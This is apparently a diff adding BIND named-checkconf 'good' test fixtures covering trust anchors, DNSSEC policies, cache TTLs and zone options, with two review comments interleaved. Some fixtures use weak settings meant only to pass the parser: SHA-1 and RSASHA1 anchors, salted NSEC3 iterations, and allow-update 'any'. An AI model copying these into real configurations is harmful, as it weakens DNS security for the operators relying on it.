+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ example. initial-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3";
+ example. initial-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/good-ds-key-2.conf b/bin/tests/system/checkconf/good-ds-key-2.conf
new file mode 100644
index 0000000..060fb2f
--- /dev/null
+++ b/bin/tests/system/checkconf/good-ds-key-2.conf
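Review bot: good-ds-key-1.conf lists `initial-ds 60724 5 1` and `initial-key 257 3 5` for the same name without a comment saying which rule the fixture exercises; good-ds-key-2.conf, next in the commit, does the same with `static-ds` and `static-key`. Presumably the point is that a DS-style and a key-style anchor of the same kind may coexist for one name, but that should be confirmed against the test driver and written down. Digest type 1 is SHA-1 and algorithm 5 is RSASHA1, so the values are also not something to copy into a resolver configuration. A header line such as `/* fixture: initial-ds and initial-key for one name are accepted together; SHA-1 values are test data only */` would cover both points.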
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ example. static-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3";
+ example. static-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/good-dup-managed-key.conf b/bin/tests/system/checkconf/good-dup-managed-key.conf
new file mode 100644
index 0000000..2f91247
--- /dev/null
+++ b/bin/tests/system/checkconf/good-dup-managed-key.conf
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnssec-validation yes;
+};
+
+trust-anchors {
+ example. initial-key 257 3 8 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl
+ 25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafG
+ tURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJY
+ kYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJ
+ fpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaS
+ WG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjI
+ NQyrszHhWUU=";
+ example. initial-key 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod
+ y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ
+ YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX
+ 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw
+ E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/
+ Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn
+ 6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/good-dup-trusted-key.conf b/bin/tests/system/checkconf/good-dup-trusted-key.conf
new file mode 100644
index 0000000..46089c4
--- /dev/null
+++ b/bin/tests/system/checkconf/good-dup-trusted-key.conf
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnssec-validation yes;
+};
+
+trusted-keys {
+ example. 257 3 8 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl
+ 25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafG
+ tURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJY
+ kYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJ
+ fpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaS
+ WG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjI
+ NQyrszHhWUU=";
+ example. 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod
+ y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ
+ YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX
+ 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw
+ E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/
+ Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn
+ 6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/good-glue-cache.conf b/bin/tests/system/checkconf/good-glue-cache.conf
new file mode 100644
index 0000000..fd5524b
--- /dev/null
+++ b/bin/tests/system/checkconf/good-glue-cache.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ glue-cache yes;
+};
diff --git a/bin/tests/system/checkconf/good-initial-ds.conf b/bin/tests/system/checkconf/good-initial-ds.conf
new file mode 100644
index 0000000..b54a2b3
--- /dev/null
+++ b/bin/tests/system/checkconf/good-initial-ds.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ example. initial-ds 60724 5 2 "29E79B9064EE1A11DF3BFF19581DDFED7952C22CC204ACE17B6007EB1437E9E6";
+};
diff --git a/bin/tests/system/checkconf/good-interface-interval.conf b/bin/tests/system/checkconf/good-interface-interval.conf
new file mode 100644
index 0000000..60c50b3
--- /dev/null
+++ b/bin/tests/system/checkconf/good-interface-interval.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ interface-interval 1h;
+};
diff --git a/bin/tests/system/checkconf/good-kasp.conf b/bin/tests/system/checkconf/good-kasp.conf
new file mode 100644
index 0000000..1a12d9f
--- /dev/null
+++ b/bin/tests/system/checkconf/good-kasp.conf
@@ -0,0 +1,68 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * This is just a random selection of DNSSEC configuration options.
+ */
+
+/* cut here */
+dnssec-policy "test" {
+ dnskey-ttl 3600;
+ keys {
+ ksk key-directory lifetime P1Y algorithm ecdsa256;
+ zsk lifetime P30D algorithm 13;
+ csk key-directory lifetime unlimited algorithm rsasha256 2048;
+ };
+ max-zone-ttl 86400;
+ nsec3param iterations 5 optout no salt-length 8;
+ parent-ds-ttl 7200;
+ parent-propagation-delay PT1H;
+ publish-safety PT3600S;
+ retire-safety PT3600S;
+ signatures-refresh P3D;
+ signatures-validity P2W;
+ signatures-validity-dnskey P14D;
+ zone-propagation-delay PT5M;
+};
+options {
+ dnssec-policy "default";
+};
+zone "example1" {
+ type master;
+ file "example1.db";
+ inline-signing yes;
+};
+zone "example2" {
+ type master;
+ file "example2.db";
+ allow-update {
+ "any";
+ };
+ dnssec-policy "test";
+};
+zone "example3" {
+ type master;
+ file "example3.db";
+ inline-signing yes;
+ dnssec-policy "default";
+};
+zone "dnssec-policy-none-shared-zonefile1" {
+ type master;
+ file "shared.db";
+ dnssec-policy "none";
+};
+zone "dnssec-policy-none-shared-zonefile2" {
+ type master;
+ file "shared.db";
+ dnssec-policy "none";
+};
diff --git a/bin/tests/system/checkconf/good-key-directory.conf b/bin/tests/system/checkconf/good-key-directory.conf
new file mode 100644
index 0000000..45befff
--- /dev/null
+++ b/bin/tests/system/checkconf/good-key-directory.conf
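Review bot: `nsec3param iterations 5 optout no salt-length 8;` in good-kasp.conf is filed as a passing configuration with nothing to mark the values as arbitrary, and good-key-directory.conf, next in the commit, uses `iterations 15` in all three policies. RFC 9276 advises zero additional iterations and an empty salt, since extra iterations cost signer and validator CPU without a comparable gain against zone enumeration. The existing comment only calls the options a random selection, so I would extend it, e.g. `/* values exercise the parser and are not recommended settings */`. The two zones that share `file "shared.db"` under `dnssec-policy "none"` also deserve a one-line comment saying why that combination is expected to pass.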
@@ -0,0 +1,73 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "internet" {
+ keys {
+ ksk key-directory lifetime unlimited algorithm ecdsa256;
+ zsk key-directory lifetime P90D algorithm ecdsa256;
+ };
+
+ nsec3param iterations 15 optout no salt-length 8;
+};
+
+dnssec-policy "intranet" {
+ keys {
+ ksk key-directory lifetime unlimited algorithm ecdsa256;
+ zsk key-directory lifetime P30D algorithm ecdsa256;
+ };
+ nsec3param iterations 15 optout no salt-length 8;
+};
+
+dnssec-policy "localhost" {
+ keys {
+ ksk key-directory lifetime unlimited algorithm ecdsa256;
+ zsk key-directory lifetime P30D algorithm ecdsa256;
+ };
+ nsec3param iterations 15 optout no salt-length 8;
+};
+
+options {
+ key-directory "global/keys";
+};
+
+view "localhost" {
+ match-clients { 127.0.0.1; ::1; };
+ zone "example.com" IN {
+ type primary;
+ file "localhost/example.com.zone";
+ dnssec-policy "localhost";
+ inline-signing yes;
+ };
+};
+
+view "external" {
+ match-clients { 0/0; };
+ key-directory "external/keys";
+ zone "example.com" IN {
+ type primary;
+ file "external/example.com.zone";
+ dnssec-policy "internet";
+ inline-signing yes;
+ };
+};
+
+view "internal" {
+ match-clients { ::/0; };
+ key-directory "internal/keys";
+ zone "example.com" IN {
+ type primary;
+ file "internal/example.com.zone";
+ dnssec-policy "intranet";
+ inline-signing yes;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-lmdb-mapsize-largest.conf b/bin/tests/system/checkconf/good-lmdb-mapsize-largest.conf
new file mode 100644
index 0000000..a55b835
--- /dev/null
+++ b/bin/tests/system/checkconf/good-lmdb-mapsize-largest.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ lmdb-mapsize 1024G;
+};
diff --git a/bin/tests/system/checkconf/good-lmdb-mapsize-smallest.conf b/bin/tests/system/checkconf/good-lmdb-mapsize-smallest.conf
new file mode 100644
index 0000000..4478706
--- /dev/null
+++ b/bin/tests/system/checkconf/good-lmdb-mapsize-smallest.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ lmdb-mapsize 1M;
+};
diff --git a/bin/tests/system/checkconf/good-masterfile-format-raw.conf b/bin/tests/system/checkconf/good-masterfile-format-raw.conf
new file mode 100644
index 0000000..b6f3cbf
--- /dev/null
+++ b/bin/tests/system/checkconf/good-masterfile-format-raw.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { ::1; };
+ masterfile-format raw;
+};
diff --git a/bin/tests/system/checkconf/good-masterfile-format-text.conf b/bin/tests/system/checkconf/good-masterfile-format-text.conf
new file mode 100644
index 0000000..8138058
--- /dev/null
+++ b/bin/tests/system/checkconf/good-masterfile-format-text.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { ::1; };
+ masterfile-format text;
+};
diff --git a/bin/tests/system/checkconf/good-masters-and-primaries.conf b/bin/tests/system/checkconf/good-masters-and-primaries.conf
new file mode 100644
index 0000000..d84657f
--- /dev/null
+++ b/bin/tests/system/checkconf/good-masters-and-primaries.conf
@@ -0,0 +1,15 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+masters a { 1.2.3.4; };
+primaries b { 1.2.3.4; };
diff --git a/bin/tests/system/checkconf/good-maxcachettl.conf b/bin/tests/system/checkconf/good-maxcachettl.conf
new file mode 100644
index 0000000..58f6901
--- /dev/null
+++ b/bin/tests/system/checkconf/good-maxcachettl.conf
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ max-cache-ttl 0;
+};
+view two {
+ max-cache-ttl 86400;
+};
+view three {
+ max-cache-ttl 4000000000;
+};
+view four {
+ max-cache-ttl 3600s;
+};
+view five {
+ max-cache-ttl 1h;
+};
+view six {
+ max-cache-ttl 1d;
+};
+view seven {
+ max-cache-ttl 1w;
+};
diff --git a/bin/tests/system/checkconf/good-maxncachettl.conf b/bin/tests/system/checkconf/good-maxncachettl.conf
new file mode 100644
index 0000000..80dc753
--- /dev/null
+++ b/bin/tests/system/checkconf/good-maxncachettl.conf
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ max-ncache-ttl 0;
+};
+view two {
+ max-ncache-ttl 86400;
+};
+view three {
+ max-ncache-ttl 604800;
+};
+view four {
+ max-ncache-ttl 3600s;
+};
+view five {
+ max-ncache-ttl 1h;
+};
+view six {
+ max-ncache-ttl 1d;
+};
+view seven {
+ max-ncache-ttl 1w;
+};
diff --git a/bin/tests/system/checkconf/good-maxratio1.conf b/bin/tests/system/checkconf/good-maxratio1.conf
new file mode 100644
index 0000000..add6b1a
--- /dev/null
+++ b/bin/tests/system/checkconf/good-maxratio1.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone example {
+ type master;
+ masterfile-format map;
+ file "example.db";
+ max-ixfr-ratio 50%;
+};
diff --git a/bin/tests/system/checkconf/good-maxratio2.conf b/bin/tests/system/checkconf/good-maxratio2.conf
new file mode 100644
index 0000000..be61ae2
--- /dev/null
+++ b/bin/tests/system/checkconf/good-maxratio2.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone example {
+ type master;
+ masterfile-format map;
+ file "example.db";
+ max-ixfr-ratio unlimited;
+};
diff --git a/bin/tests/system/checkconf/good-mincachettl.conf b/bin/tests/system/checkconf/good-mincachettl.conf
new file mode 100644
index 0000000..b619a73
--- /dev/null
+++ b/bin/tests/system/checkconf/good-mincachettl.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ min-cache-ttl 0;
+};
+view two {
+ min-cache-ttl 30;
+};
+view three {
+ min-cache-ttl 60;
+};
+view four {
+ min-cache-ttl 90s;
+};
+view five {
+ min-cache-ttl 1m;
+};
diff --git a/bin/tests/system/checkconf/good-minncachettl.conf b/bin/tests/system/checkconf/good-minncachettl.conf
new file mode 100644
index 0000000..3e4101b
--- /dev/null
+++ b/bin/tests/system/checkconf/good-minncachettl.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ min-ncache-ttl 0;
+};
+view two {
+ min-ncache-ttl 30;
+};
+view three {
+ min-ncache-ttl 60;
+};
+view four {
+ min-ncache-ttl 90s;
+};
+view five {
+ min-ncache-ttl 1m;
+};
diff --git a/bin/tests/system/checkconf/good-mirror-inherited-notify-yes.conf b/bin/tests/system/checkconf/good-mirror-inherited-notify-yes.conf
new file mode 100644
index 0000000..09bbf94
--- /dev/null
+++ b/bin/tests/system/checkconf/good-mirror-inherited-notify-yes.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ notify yes;
+};
+
+zone "." {
+ type mirror;
+};
diff --git a/bin/tests/system/checkconf/good-mirror-root-zone-without-masters.conf b/bin/tests/system/checkconf/good-mirror-root-zone-without-masters.conf
new file mode 100644
index 0000000..9723b7a
--- /dev/null
+++ b/bin/tests/system/checkconf/good-mirror-root-zone-without-masters.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type mirror;
+};
diff --git a/bin/tests/system/checkconf/good-nested.conf b/bin/tests/system/checkconf/good-nested.conf
new file mode 100644
index 0000000..12a027c
--- /dev/null
+++ b/bin/tests/system/checkconf/good-nested.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl a { 127.0.0.1; ::1; };
+acl b { a; };
+acl c { !b; };
+
+options {
+ allow-query { c; };
+};
diff --git a/bin/tests/system/checkconf/good-notify-source-v6.conf b/bin/tests/system/checkconf/good-notify-source-v6.conf
new file mode 100644
index 0000000..797f966
--- /dev/null
+++ b/bin/tests/system/checkconf/good-notify-source-v6.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ notify-source-v6 fd92:7065:b8e:ffff::1;
+};
diff --git a/bin/tests/system/checkconf/good-notify-source.conf b/bin/tests/system/checkconf/good-notify-source.conf
new file mode 100644
index 0000000..6b97314
--- /dev/null
+++ b/bin/tests/system/checkconf/good-notify-source.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ notify-source 10.53.0.1;
+};
diff --git a/bin/tests/system/checkconf/good-options-also-notify.conf b/bin/tests/system/checkconf/good-options-also-notify.conf
new file mode 100644
index 0000000..75066ef
--- /dev/null
+++ b/bin/tests/system/checkconf/good-options-also-notify.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ also-notify { missing; };
+};
+
+zone "example.net" {
+ type slave;
+ notify no;
+ masters { 192.168.1.1; };
+};
diff --git a/bin/tests/system/checkconf/good-parental-source-v6.conf b/bin/tests/system/checkconf/good-parental-source-v6.conf
new file mode 100644
index 0000000..fe998f1
--- /dev/null
+++ b/bin/tests/system/checkconf/good-parental-source-v6.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ parental-source-v6 fd92:7065:b8e:ffff::1;
+};
diff --git a/bin/tests/system/checkconf/good-parental-source.conf b/bin/tests/system/checkconf/good-parental-source.conf
new file mode 100644
index 0000000..e45856a
--- /dev/null
+++ b/bin/tests/system/checkconf/good-parental-source.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ parental-source 10.53.0.1;
+};
diff --git a/bin/tests/system/checkconf/good-printtime.conf b/bin/tests/system/checkconf/good-printtime.conf
new file mode 100644
index 0000000..06bb7be
--- /dev/null
+++ b/bin/tests/system/checkconf/good-printtime.conf
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
